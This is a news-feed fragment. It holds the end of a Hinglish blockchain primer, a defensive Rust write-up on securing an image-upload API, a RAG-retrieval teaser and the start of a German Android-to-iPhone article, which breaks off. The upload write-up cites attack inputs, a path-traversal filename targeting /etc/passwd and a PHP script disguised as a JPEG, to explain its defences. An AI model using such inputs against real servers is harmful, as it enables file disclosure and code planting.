"stake" karo (lock kar do)<br>   2. Validator ban jaao<br>   3. Network randomly tumhe block propose karne deta<br>   4. Propose karo → check hoga → reward milega (~5% APY)<br>   5. Fraud karo → tumhari stake "SLASHED" ho jaayegi!<br>      (Burn ho jaayegi — permanently!)<br><br>Example:<br>   32 ETH stake = ~$100,000 (current price pe)<br>   Fraud kiya   → 32 ETH gone = $100,000 instantly!<br>   Isliye fraud nahi karte!<br><br>Kyun better than PoW?<br>   → 99.95% less energy!<br>   → More validators possible<br>   → Ethereum ne "The Merge" (Sep 2022) mein switch kiya<br>   → Environment friendly</pre><h3>PoW vs PoS Comparison:</h3><pre>Feature             | PoW (Bitcoin)   | PoS (Ethereum)<br>--------------------|-----------------|----------------<br>Energy Use          | Very High       | Very Low   <br>Security            | Very High       | High       <br>Decentralization    | High            | High       <br>Who creates blocks? | Miners          | Stakers<br>Entry requirement   | Mining rigs     | 32 ETH<br>Block time          | ~10 minutes     | ~12 seconds<br>Eco-friendly?       | No              | Yes        <br>Reward              | 3.125 BTC/block | ~5% APY</pre><h3>PART 7: Blockchain Types Teen Types!</h3><pre>1. PUBLIC BLOCKCHAIN <br>   → Koi bhi join kar sakta hai<br>   → Koi bhi transactions dekh sakta hai<br>   → Fully decentralized<br>   → Examples: Bitcoin, Ethereum, Solana, Polygon<br>   → Use case: Crypto, DeFi, NFTs, Smart Contracts<br>   → Security: Highest (maximum nodes)<br><br>2. PRIVATE BLOCKCHAIN <br>   → Sirf invited members join kar sakte hain<br>   → Ek organization control karti hai<br>   → Centralized internally<br>   → Examples: Hyperledger Fabric, Corda<br>   → Use case: Supply chain, Banking, Healthcare<br>   → Security: Depends on organization<br><br>3. CONSORTIUM / HYBRID BLOCKCHAIN <br>   → Multiple organizations milke control karte hain<br>   → Semi-decentralized<br>   → Examples: Quorum (JPMorgan), R3 Corda<br>   → Use case: Inter-bank transactions<br>   → Security: Medium (depends on members)<br><br>4. LAYER 2 (Bonus!)<br>   → Main blockchain ke upar chalta hai<br>   → Faster + Cheaper transactions<br>   → Main chain se security inherit hoti hai<br>   → Examples: Polygon, Arbitrum, Optimism<br>   → Use case: DeFi, Gaming, NFTs at low cost</pre><h3>PART 8: Real World Examples Kahan Use Ho Raha Hai?</h3><pre>1. CRYPTOCURRENCY <br>   Bitcoin, Ethereum, Solana...<br>   Peer-to-peer money transfer — no bank needed!<br><br>   Ankleshwar → New York transfer:<br>   Blockchain : 10 seconds, $0.10 fee<br>   Bank Wire  : 3-5 days, $30-50 fee<br>   Clear winner! <br><br>2. DeFi (Decentralized Finance) <br>   Loans bina bank ke<br>   Interest earn karo apne crypto pe<br>   Crypto exchange karo (Uniswap)<br>   Sab kuch code se — koi human nahi!<br><br>3. NFTs (Non-Fungible Tokens) <br>   Digital ownership proof on blockchain<br>   Art, Music, Games, Virtual land<br>   Yeh articles bhi NFT ho sakte hain!<br><br>4. Supply Chain <br>   Mango kahan se aaya — track karo!<br>   Medicine authentic hai? — verify karo!<br>   Walmart, Maersk, IBM use kar rahe hain<br><br>5. Voting <br>   Transparent tamper-proof elections<br>   Several countries experiment kar rahe hain<br>   India bhi pilot projects kar raha hai<br><br>6. Healthcare <br>   Medical records securely share karo<br>   Patient apna data control kare<br>   Drug authenticity verify karo<br><br>7. Gaming <br>   Axie Infinity, Decentraland, Gods Unchained<br>   In-game items truly tumhare!<br>   Sell karo — real money pao!</pre><h3>PART 9: Ek Transaction Ki Poori Journey!</h3><pre>Alice ne Bob ko 1 ETH bhejna hai:<br><br>┌─────────────────────────────────────┐<br>│ STEP 1: Transaction Create          │<br>│                                     │<br>│ Alice apni private key se sign:     │<br>│ {                                   │<br>│   "from"     : "0xAlice...",        │<br>│   "to"       : "0xBob...",          │<br>│   "value"    : 1 ETH,               │<br>│   "gas"      : 21000,               │<br>│   "gasPrice" : 20 gwei,             │<br>│   "nonce"    : 42,                  │<br>│   "signature": "0xABC_sign..."      │<br>│ }                                   │<br>└──────────────┬──────────────────────┘<br>               │<br>               ▼<br>┌─────────────────────────────────────┐<br>│ STEP 2: Network Pe Broadcast        │<br>│                                     │<br>│ Alice ka wallet → Sabhi nodes ko    │<br>│ Sab nodes apne "MEMPOOL" mein store │<br>│(Mempool = Pending txns waiting area)│<br>└──────────────┬──────────────────────┘<br>               │<br>               ▼<br>┌─────────────────────────────────────┐<br>│ STEP 3: Validator Pick Up           │<br>│                                     │<br>│ Ek validator mempool se txns pick   │<br>│ Gas fee zyada = Priority milegi!    │<br>│ "Jaldi chahiye? Zyada gas do!"      │<br>└──────────────┬──────────────────────┘<br>               │<br>               ▼<br>┌─────────────────────────────────────┐<br>│ STEP 4: Block Create                │<br>│                                     │<br>│ Multiple transactions ek block mein │<br>│ Hash calculate hota hai             │<br>│ Block network ko propose hota hai   │<br>└──────────────┬──────────────────────┘<br>               │<br>               ▼<br>┌─────────────────────────────────────┐<br>│ STEP 5: Network Validates           │<br>│                                     │<br>│ Doosre validators check karte hain: │<br>│ ✅ Alice ke paas 1 ETH tha?         │<br>│ ✅ Signature valid hai?             │<br>│ ✅ Nonce sahi hai?                  │<br>│ ✅ Gas sufficient hai?              │<br>│ ✅ Block hash valid hai?            │<br>└──────────────┬──────────────────────┘<br>               │<br>               ▼<br>┌─────────────────────────────────────┐<br>│ STEP 6: FINALIZED!                  │<br>│                                     │<br>│ Alice : -1 ETH (minus gas fee)      │<br>│ Bob   : +1 ETH                      │<br>│ TxID  : 0xTxHash...                 │<br>│ Forever on blockchain!              │<br>│ Time  : ~12 seconds (Ethereum)      │<br>└─────────────────────────────────────┘</pre><h3>PART 10: Security Hacker Ki Nazar Se!</h3><pre>Blockchain kyun secure hai?<br><br>1. CRYPTOGRAPHIC SECURITY<br>   → Keccak-256 hashing (Ethereum)<br>   → SHA-256 hashing (Bitcoin)<br>   → Mathematically unbreakable<br>   → Quantum threat future mein... (watch out!)<br><br>2. DECENTRALIZATION<br>   → No single point of failure<br>   → 7000+ nodes worldwide<br>   → Sab ke paas same copy<br><br>3. IMMUTABILITY<br>   → Past data change nahi ho sakta<br>   → Har node verify karta hai<br>   → Cryptographic proofs har block mein<br><br>4. CONSENSUS<br>   → Majority agree kare tabhi valid<br>   → 51% attack astronomically expensive<br><br>PAR... yeh sab BLOCKCHAIN ke liye sach hai!<br><br>SMART CONTRACTS alag story hai! <br><br>Smart Contract = Code on blockchain<br>Code mein bugs ho sakte hain!<br><br>Proof:<br>   → $625M    Ronin Bridge Hack (2022)<br>   → $320M    Wormhole Hack (2022)<br>   → $197M    Euler Finance Hack (2023)<br>   → $60M     TheDAO Hack (2016)<br>   → $3.8B    Total stolen in 2022 alone!<br><br>Blockchain = SECURE <br>Smart Contracts = CAN BE VULNERABLE <br><br>Isliye Web3 Security seekhna zaroori hai!<br>Isliye Immunefi pe $100M+ bounties hain!<br>Isliye tum yeh series padh rahe ho! </pre><h3>PART 11: Blockchain Ki Limitations Honest Baat!</h3><pre>1. SCALABILITY<br>   Bitcoin    :  7 transactions/second<br>   Ethereum   : 15-30 transactions/second<br>   Visa       : 24,000 transactions/second<br>   → Solution : Layer 2 (Polygon, Arbitrum, Optimism)<br><br>2. GAS FEES<br>   Peak time pe $50-200 per transaction!<br>   → Solution : PoS + L2 ne drastically reduce kiya<br><br>3. ENERGY (PoW mein)<br>   Bitcoin = Portugal jaisi country ka energy!<br>   → Solution : Ethereum PoS pe gaya (99.95% less!)<br><br>4. SMART CONTRACT BUGS  ← Our Main Focus!<br>   Code deploy hone ke baad change nahi hota!<br>   Bug = Billion dollar loss possible!<br><br>5. REGULATORY<br>   Different countries, different laws<br>   India: Legal but 30% tax on gains<br><br>6. UX (User Experience)<br>   Private key kho gayi = Sab kuch gone!<br>   No "Forgot Password" button!<br><br>7. ORACLE PROBLEM<br>   Blockchain ko real-world data chahiye<br>   Oracle se aata hai → Oracle hack ho sakta!<br>   (Series Article #28-29 mein cover karenge!)</pre><h3>PART 12: Key Terms Quick Glossary</h3><pre>Term             | Meaning<br>-----------------|----------------------------------------------<br>Blockchain       | Distributed tamper-proof ledger<br>Block            | Data ka packet (hash, txns, prev_hash)<br>Hash             | Data ka unique fingerprint<br>Node             | Network participant computer<br>Miner            | PoW mein block create karne wala<br>Validator        | PoS mein block create karne wala<br>Consensus        | Network agreement mechanism<br>PoW              | Proof of Work (Bitcoin style)<br>PoS              | Proof of Stake (Ethereum style)<br>Mempool          | Pending transactions waiting pool<br>Gas              | Ethereum mein transaction fee<br>Nonce            | Number used once (mining/tx)<br>Genesis Block    | Blockchain ka sabse pehla block<br>51% Attack       | Majority nodes control ka attack<br>Smart Contract   | Self-executing code on blockchain<br>dApp             | Decentralized Application<br>DeFi             | Decentralized Finance<br>NFT              | Non-Fungible Token<br>Wallet           | Keys manage karne wala software<br>Private Key      | Tumhara secret — kabhi share mat karo!<br>Public Key       | Tumhara address — freely share karo<br>Layer 2          | Main chain ke upar fast/cheap network<br>Slashing         | PoS mein validator ki stake burn karna<br>Merkle Tree      | Transactions ka tree-structured hash</pre><h3>PART 13: Hands-On Practice Abhi Karo!</h3><pre># ─── Task 1: Live Blockchain Dekho ────────<br><br># Browser mein jaao:<br>https://etherscan.io<br><br># Latest block click karo:<br>→ Block number dekho<br>→ Transactions count dekho (100-200 usually)<br>→ Gas used dekho<br>→ Validator address dekho<br>→ Block hash copy karo (0x se shuru hoga)<br><br># ─── Task 2: Ek Transaction Dekho ─────────<br><br># Koi bhi transaction click karo:<br>→ From address<br>→ To address<br>→ Value (ETH amount)<br>→ Gas fee (kitna pay kiya)<br>→ Timestamp<br>→ Status: Success ya Failed <br><br># ─── Task 3: Python Mein Hash Try Karo ────<br><br>python3<br>&gt;&gt;&gt; import hashlib<br>&gt;&gt;&gt; hashlib.sha256(b"Hello").hexdigest()<br>&gt;&gt;&gt; hashlib.sha256(b"hello").hexdigest()<br>&gt;&gt;&gt; # Difference dekho — ek character alag!<br><br># ─── Task 4: MetaMask Setup ────────────────<br><br># Install: https://metamask.io<br># Sepolia Testnet add karo (free practice!)<br># Free test ETH lo:<br># https://sepoliafaucet.com<br><br># ─── Task 5: Mini Blockchain Code Run Karo ─<br><br># Upar wala Python code copy karo<br># Run karo — fraud attempt ka output dekho!<br><br># ─── Bonus Task ────────────────────────────<br><br># USDC Smart Contract dekho on Etherscan:<br># 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48<br># Contract → Code tab → Solidity code!<br># Yeh wahi code hai jisme bugs dhundhne hain!</pre><h3>Quick Revision</h3><pre> Blockchain   = Distributed tamper-proof ledger<br> Block        = Data + PrevHash + Nonce + Hash<br> Hash         = Kisi bhi data ka unique fingerprint<br> Decentralized = 7000+ nodes — no single control<br> Consensus    = Network kaise agree karta hai<br> PoW          = Mining — puzzle solve = reward<br> PoS          = Staking — 32 ETH lock = validator<br> Blockchain   = Cryptography + Decentralization<br> Weakness     = Smart Contract CODE mein bugs!<br> Opportunity  = Bugs dhundho = Millions earn karo!</pre><h3>Meri Baat…</h3><p>Jab maine pehli baar blockchain padha tha:</p><blockquote>“Yeh toh sirf ek complicated database hai!”</blockquote><p>Par phir samjha</p><pre>Traditional Database (Web2):<br>   → Company delete kar sakti hai tumhara data<br>   → Bank freeze kar sakta hai account<br>   → Hack ho sakta hai ek baar mein<br><br>Blockchain (Web3):<br>   → Koi delete nahi kar sakta<br>   → Koi freeze nahi kar sakta<br>   → Hack karne ke liye $20 Billion/hour chahiye<br><br>Aur is "unhackable" blockchain pe<br>Smart Contracts run karte hain —<br>jo CODE se bane hain...<br><br>Code = Bugs possible!<br>Bugs = Billions lost!<br>Bugs dhundho = Bounty pao!<br><br>Isliye Web3 Security ek<br>$10 Billion/year opportunity hai!<br>Immunefi pe akele $100M+ bounties paid!<br><br>Tumhara journey shuru ho chuka hai! 🚀</pre><p><strong>Article #2 mein:</strong> Web2 vs Web3 Security exact attack surface, kya alag hai, kahan se shuru karo hunting!</p><p><strong><em>HackerMD</em></strong><em> — Web3 Security Researcher</em><br><em>GitHub: </em><a href="https://github.com/BotGJ16"><em>BotGJ16</em></a><em> | Medium: </em><a href="https://medium.com/@HackerMD"><em>@HackerMD</em></a></p><p><em>Next: Article #2 Web2 vs Web3: Security Perspective</em></p><p><em>#Blockchain #Web3Security #BugBounty #Hinglish #Ethereum #Bitcoin #HackerMD</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=7eb4a11d0596" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/blockchain-kya-hota-hai-bilkul-zero-se-samjho-7eb4a11d0596">Blockchain Kya Hota Hai? Bilkul Zero Se Samjho!</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Securing DotShare 3.3:]]></title>
<description><![CDATA[Securing DotShare 3.3: Inside the Rust Media API (Magic Bytes, Atomic Quotas, & Race Fixes) — Part 3Our journey building a production-grade Cloudflare R2 upload pipeline in Rust — featuring layered security, an atomic quota system, and a zero-trust file validation strategy.In Part 2 of this serie...]]></description>
<link>https://tsecurity.de/de/3559887/hacking/securing-dotshare-33/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559887/hacking/securing-dotshare-33/</guid>
<pubDate>Sun, 31 May 2026 02:37:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Securing DotShare 3.3: Inside the Rust Media API (Magic Bytes, Atomic Quotas, &amp; Race Fixes) — Part 3</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/905/1*Ku06n90UlBx7ug-LDwNENg.png"></figure><h3>Our journey building a production-grade Cloudflare R2 upload pipeline in Rust — featuring layered security, an atomic quota system, and a zero-trust file validation strategy.</h3><p>In <a href="https://medium.com/@freerave/i-built-a-fail-fast-rust-scheduler-with-background-oauth-auto-refresh-part-2-1859c41a9d30">Part 2 of this series</a>, we successfully enforced <strong>Strict Separation</strong> and <strong>Fail-Fast</strong> validation to prevent silent scheduling failures and auto-refresh OAuth tokens in the background. We thought the hardest part was over.</p><p>But our users still needed to attach images to their scheduled posts. And the moment you allow users to upload files to your server, you inherit one of the most complex security problems in backend engineering. The golden rule here is simple but harsh: <strong>you can never trust what a user sends you.</strong></p><p>Here is the full story of how we built the POST /v1/media/upload endpoint in Rust — starting from strict file validation, moving through Cloudflare R2 storage, and culminating in an atomic quota system that saved us from a highly elusive race condition.</p><h3>The Problem: File Uploads Are a Security Minefield</h3><p>Allowing file uploads without meticulous validation is a hacker’s favorite way to compromise a server. The naive approach — checking the file extension or blindly trusting the Content-Type header — is the equivalent of leaving your vault doors wide open.</p><p>A malicious user can trivially rename exploit.php to photo.jpg and send it with Content-Type: image/jpeg. A server that trusts that header will happily store an executable PHP script in a directory meant for innocent images. A complete disaster.</p><p>We needed a <strong>Zero-Trust</strong> validation pipeline. The new rule: <strong>Don’t believe anything the client tells you. Verify everything from the raw binary.</strong></p><h3>Layer 1: The Gatekeepers &amp; Body Limits (Router Level)</h3><p>Before a single byte of the file payload is even parsed, two guards stand watch at the Axum router level.</p><p>The first is our existing Bearer JWT middleware — no valid token, no entry. The second is a global body size limit enforced directly on the router:</p><pre>// src/main.rs<br><br>use axum::extract::DefaultBodyLimit;<br>let app = Router::new()<br>    .route("/v1/media/upload", post(routes::media::upload_media))<br>    // ... other routes ...<br>    .layer(DefaultBodyLimit::max(10 * 1024 * 1024)); // 10 MB hard cap</pre><p>This DefaultBodyLimit layer brutally rejects oversized requests at the framework level — long before our handler allocates any memory for the file. This is our outermost defense wall.</p><h3>Layer 2: Magic Bytes (The File’s DNA)</h3><p>Inside the handler, we apply a second, stricter file size check (5 MB) and then move to the core of our zero-trust strategy: <strong>Magic Bytes validation</strong>.</p><p>Every legitimate image file format begins with a known binary signature, called a “magic number,” embedded in the first few bytes of the file. JPEG files always start with FF D8 FF. PNG files always start with 89 50 4E 47. You cannot fake this fingerprint without entirely corrupting the file.</p><p>Here is how we built our ultimate lie detector:</p><pre>// src/routes/media.rs<br><br>// Allowed MIME types and their corresponding magic bytes<br>const ALLOWED_TYPES: &amp;[(&amp;str, &amp;[&amp;[u8]], &amp;str)] = &amp;[<br>    ("image/jpeg", &amp;[&amp;[0xff, 0xd8, 0xff]], "jpg"),<br>    ("image/png",  &amp;[&amp;[0x89, 0x50, 0x4e, 0x47]], "png"),<br>    ("image/webp", &amp;[&amp;[0x52, 0x49, 0x46, 0x46]], "webp"), // RIFF header<br>    ("image/gif",  &amp;[&amp;[0x47, 0x49, 0x46, 0x38]], "gif"),<br>];<br>fn validate_magic_bytes(buffer: &amp;[u8], mime_type: &amp;str) -&gt; Option&lt;&amp;'static str&gt; {<br>    for (allowed_mime, magics, ext) in ALLOWED_TYPES {<br>        if *allowed_mime == mime_type {<br>            for magic in *magics {<br>                if buffer.starts_with(*magic) {<br>                    return Some(ext); // Return the verified extension<br>                }<br>            }<br>        }<br>    }<br>    None // Content-Type claimed a valid MIME but binary doesn't match - reject<br>}</pre><p>This function hits two birds with one stone. First, it ensures the claimed Content-Type is on our whitelist. Second, it verifies that the actual binary content matches that format. An executable masquerading as an image will fail miserably here because its binary signature will never match FF D8 FF.</p><h3>Layer 3: Burning the Filename (Path Traversal Prevention)</h3><p>Even after validating the file’s integrity, you should never use the client-supplied filename for storage. A filename like ../../../etc/passwd — known as a <strong>Path Traversal</strong> attack — could theoretically escape your intended storage directory and overwrite critical system files.</p><p>Our solution? Burn the original filename entirely and generate a random UUID to serve as the storage key:</p><pre>// The raw client filename is intentionally discarded.<br>// UUID-based key — fully immune to path traversal.<br>let file_name = format!("dotsuite/scheduled_posts/{}.{}", Uuid::new_v4(), ext);</pre><p>Notice that the extension (ext) comes from our trusted validate_magic_bytes function — not the client. The entire storage path is server-generated. The user's filename never touches our storage layer.</p><h3>Layer 4: Atomic Quotas (Closing the Race Condition)</h3><p>This is where things got incredibly tricky. Initially, our user quota check looked entirely reasonable:</p><pre>// ❌ The naive (broken) approach<br>let current = user.images_used; // Read from DB<br>if current &gt;= image_quota {<br>    return Err(quota_exceeded_error);<br>}<br>// ... upload the file ...<br>db.increment_images_used(user_id).await; // Write to DB</pre><p><strong>The Fatal Flaw:</strong> There is a microscopic window of time between reading the quota and writing the increment. What if a user sends two upload requests at the exact same millisecond, and their counter is at Limit - 1? Both requests will read current &lt; limit, both will pass the check, and both will upload the file — silently bypassing the quota and pushing the counter to Limit + 1!</p><p>To fix this, we utilized the power of atomic operations in MongoDB. We used find_one_and_update to combine the check and the increment into a single, indivisible database command:</p><pre>// src/routes/media.rs<br><br>// ── Atomic quota check + slot reservation ────────────────────────────────<br>// find_one_and_update eliminates the race condition: the check and the<br>// increment are a single atomic MongoDB operation, not two separate ones.<br>let quota_filter = if user.tier == Tier::Free {<br>    mongodb::bson::doc! {<br>        "_id": user_id,<br>        "$expr": { "$lt": ["$images_used", image_quota as i64] }<br>    }<br>} else {<br>    // Paid tiers have no hard cap - we still track for analytics.<br>    mongodb::bson::doc! { "_id": user_id }<br>};<br>let reserved = users_col<br>    .find_one_and_update(<br>        quota_filter,<br>        mongodb::bson::doc! { "$inc": { "images_used": 1 } },<br>    )<br>    .await?;<br>if reserved.is_none() {<br>    return Err(AppError::Forbidden(format!(<br>        "Image upload quota reached ({}/{} uploads). Upgrade to Basic for unlimited uploads.",<br>        user.images_used, image_quota<br>    )));<br>}</pre><p>Now, the database acts as the single source of truth. No two concurrent requests can bypass the gate simultaneously because MongoDB guarantees the atomicity of the operation.</p><h3>Layer 5: Cloudflare R2 Upload &amp; The Rollback</h3><p>After securing a slot in the quota, we upload the file to Cloudflare R2 via the AWS S3-compatible SDK. But wait, what if the cloud upload fails <em>after</em> we’ve already incremented the user’s quota counter? The user would be penalized for a network failure they didn’t cause.</p><p>To handle this gracefully, we perform a <strong>rollback</strong> on failure:</p><pre>if let Err(e) = upload_result {<br>    tracing::error!("Failed to upload to R2: {:?}", e);<br><br>// Rollback: return the slot so the quota isn't wasted.<br>    let rollback = users_col<br>        .update_one(<br>            mongodb::bson::doc! { "_id": user_id },<br>            mongodb::bson::doc! { "$inc": { "images_used": -1i32 } },<br>        )<br>        .await;<br>    if let Err(rb_err) = rollback {<br>        tracing::error!(<br>            "Failed to rollback images_used for user {}: {}",<br>            user_id, rb_err<br>        );<br>    }<br>    return Err(AppError::Internal(anyhow::anyhow!(<br>        "Failed to upload media to cloud storage"<br>    )));<br>}</pre><p>This rollback is a “best-effort” execution. We log a critical error if it fails, but we keep the internal mechanics hidden from the user.</p><h3>The Big Picture: Our Security Arsenal</h3><p>Here is exactly what happens behind the scenes on every single upload request:</p><p><strong>1. Bearer JWT Middleware</strong></p><ul><li><strong>What It Rejects:</strong> Unauthenticated ghost requests.</li></ul><p><strong>2. </strong><strong>DefaultBodyLimit (10 MB)</strong></p><ul><li><strong>What It Rejects:</strong> Massively oversized payloads before memory allocation.</li></ul><p><strong>3. Handler Size Check (5 MB)</strong></p><ul><li><strong>What It Rejects:</strong> Files exceeding the per-file business limit.</li></ul><p><strong>4. Magic Bytes Validation</strong></p><ul><li><strong>What It Rejects:</strong> Forged MIME types, executables, and corrupted files.</li></ul><p><strong>5. Atomic </strong><strong>find_one_and_update</strong></p><ul><li><strong>What It Rejects:</strong> Quota-exceeded requests (entirely immune to race conditions).</li></ul><p><strong>6. UUID Storage Keys</strong></p><ul><li><strong>What It Rejects:</strong> Path traversal (../) attacks.</li></ul><p><strong>7. R2 Upload + Rollback</strong></p><ul><li><strong>What It Rejects:</strong> Storage network failures (without robbing the user’s quota).</li></ul><p>None of these layers are sufficient on their own. Together, they form a <strong>defense-in-depth</strong> architecture where every layer assumes the previous one could have been compromised.</p><h3>Conclusion</h3><p>Building a production-grade file upload endpoint is deceptively complex. Writing the surface-level logic — “receive file, save file” — takes an hour. Hardening it against the harsh reality of the internet takes days.</p><p>Here are the 3 biggest lessons from this build:</p><ul><li><strong>Never trust </strong>Content-Type<strong>.</strong> A header is merely a claim, not proof. Always read the raw binary signature (Magic Bytes) of the file.</li><li><strong>Checking a quota and incrementing it must be one atomic operation.</strong> Issuing two separate database calls — even milliseconds apart — creates a race window that determined users will inevitably exploit.</li><li><strong>Reserve resources before expensive operations, and roll back on failure.</strong> Deducting the quota <em>before</em> the R2 upload, and refunding it upon failure, is far safer than trying to deduct it after a successful upload that might drop midway.</li></ul><p>Our POST /v1/media/upload endpoint is now an impenetrable vault. In Part 4, we will build the Next.js scheduling UI that communicates with this API.</p><p><em>FreeRave is the founder of </em><a href="https://dotsuite.vercel.app/en"><em>DotSuite</em></a><em>, building productivity tools for developers. Follow for more deep dives into real-world production architecture.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=82524ce1d776" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/securing-dotshare-3-3-82524ce1d776">Securing DotShare 3.3:</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Embeddings Aren’t Magic: The Predictable Failure Modes of RAG Retrieval]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol. 1 #2] Why the same vector search that handles synonyms and paraphrase silently fails on negation, exact identifiers, and your company’s acronyms, and what to use when it does.
The post Embeddings Aren’t Magic: The Predictable Failure Modes of RAG Retrieval a...]]></description>
<link>https://tsecurity.de/de/3559290/ai-nachrichten/embeddings-arent-magic-the-predictable-failure-modes-of-rag-retrieval/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559290/ai-nachrichten/embeddings-arent-magic-the-predictable-failure-modes-of-rag-retrieval/</guid>
<pubDate>Sat, 30 May 2026 17:33:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol. 1 #2] Why the same vector search that handles synonyms and paraphrase silently fails on negation, exact identifiers, and your company’s acronyms, and what to use when it does.</p>
<p>The post <a href="https://towardsdatascience.com/embeddings-arent-magic-the-predictable-failure-modes-of-rag-retrieval-enterprise-document-intelligence-vol-1-2/">Embeddings Aren’t Magic: The Predictable Failure Modes of RAG Retrieval</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Von Android zum iPhone: Das habe ich dabei gelernt]]></title>
<description><![CDATA[Anyron Copeman / Foundry



Wenn ich sage, dass ich für meinen Lebensunterhalt Smartphones teste und rezensiere, dann meine ich eigentlich, dass ich für meinen Lebensunterhalt Android-Handys rezensiere. Das sollte keine große Überraschung sein, denn es kommen jedes Jahr dutzende neue Geräte auf d...]]></description>
<link>https://tsecurity.de/de/3558312/it-security-nachrichten/von-android-zum-iphone-das-habe-ich-dabei-gelernt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558312/it-security-nachrichten/von-android-zum-iphone-das-habe-ich-dabei-gelernt/</guid>
<pubDate>Sat, 30 May 2026 06:07:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.08.png?w=1024" alt="Smartphones" class="wp-image-4177752" width="1024" height="579" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>



<p>Wenn ich sage, dass ich für meinen Lebensunterhalt Smartphones teste und rezensiere, dann meine ich eigentlich, dass ich für meinen Lebensunterhalt <em>Android-Handys</em> rezensiere. Das sollte keine große Überraschung sein, denn es kommen jedes Jahr dutzende neue Geräte auf den Markt.</p>



<p>Das soll nicht heißen, dass iPhones nicht wichtig sind, ganz im Gegenteil. Aber bei maximal fünf neuen Handys pro Jahr waren meine Chancen, als Junior-Redakteur eins zu testen, eher gering.</p>



<p>Das änderte sich, als ich 2023 Redakteur für Mobilgeräte wurde. Plötzlich wurde es für mich zur Priorität, herauszufinden, was in der geheimnisvollen Welt der Apple-Smartphones vor sich geht. Das habe ich also getan.</p>



<p>Aber nachdem ich meine SIM-Karte in das <a href="https://www.macwelt.de/article/2457559/iphone-16-pro-max-im-test.html" target="_blank">iPhone 16 Pro</a> eingelegt hatte (das erste iPhone, das ich seit dem iPhone 5 im Jahr 2012 als Haupthandy benutzte), war ich nicht darauf vorbereitet, wie anders es sein würde.</p>



<p>In den zwei Wochen, die ich mit dem Gerät verbracht habe, habe ich viel über Apple und seine Herangehensweise an Smartphone-Hardware und -Software gelernt. Wenn Sie ein Android-Liebhaber sind und den Umstieg in Erwägung ziehen, sollten Sie auch diese 8 Dinge beachten (<strong>Hinweis</strong>: Die folgenden Ausführungen beziehen sich auf das iPhone und iOS vor dem Erscheinen des <a href="https://www.pcwelt.de/article/2652810/nach-ueber-12-jahren-android-wechsle-ich-zum-iphone-das-lernte-ich-dabei.html#">iPhone 17</a> und iOS 26).</p>



<h2 class="wp-block-heading">Whatsapp-Probleme</h2>



<p>Von allen Apps und Daten, die ich <a href="https://www.pcwelt.de/article/1140818/so_klappt_der_umstieg_von_ios_auf_android-umzug_auf_ein_neues_smartphone.html" target="_blank">zwischen Android und iOS verschieben</a> wollte, bereitete mir Whatsapp die meisten Kopfschmerzen.</p>



<p>Ich bin es bereits gewohnt, meine Chats auf einem Handy zu sichern und sie dann auf einem anderen neu zu registrieren und wiederherzustellen. Aber während Android Google Drive für Backups verwendet, verlässt sich das iPhone auf iCloud.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.20.png?w=1024" alt="Smartphones" class="wp-image-4177753" width="1024" height="581" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Whatsapp auf dem iPhone zum Laufen zu bringen, kann eine Weile dauern.</figcaption></figure><p class="imageCredit">DenPhotos / Shutterstock.com</p></div>



<p>Bis 2022 gab es keine einfache Möglichkeit, Ihren Chatverlauf zu verschieben. Das <a href="https://www.pcwelt.de/article/1152538/whatsapp-sauber-auf-ein-neues-smartphone-uebertragen-android.html" target="_blank">hat sich inzwischen geändert</a>, aber es hängt immer noch davon ab, dass Sie die App “Auf iOS übertragen” verwenden und sie transferieren, sobald Sie Ihr neues iPhone einrichten. Wenn Sie das vergessen, müssen Sie das Gerät zurücksetzen und von vorne beginnen.</p>



<p>Glücklicherweise gibt es eine Alternative, die für meinen vorübergehenden Wechsel perfekt war. Ich fügte das iPhone 16 Pro einfach als “verknüpftes Gerät” hinzu (Sie können bis zu vier Geräte hinzufügen), sodass ich mein Android-Handy als Hauptgerät behalten konnte. Für mich war das eine perfekte Lösung, denn es funktioniert auch, wenn das Hauptgerät ausgeschaltet ist. Allerdings müssen Sie sich mindestens einmal alle 14 Tage darauf anmelden.</p>



<p>Mehr als bei jeder anderen App müssen Sie für Whatsapp also einen Plan haben, bevor Sie mit dem Wechsel beginnen.</p>



<h2 class="wp-block-heading">Was sind das für Tasten?</h2>



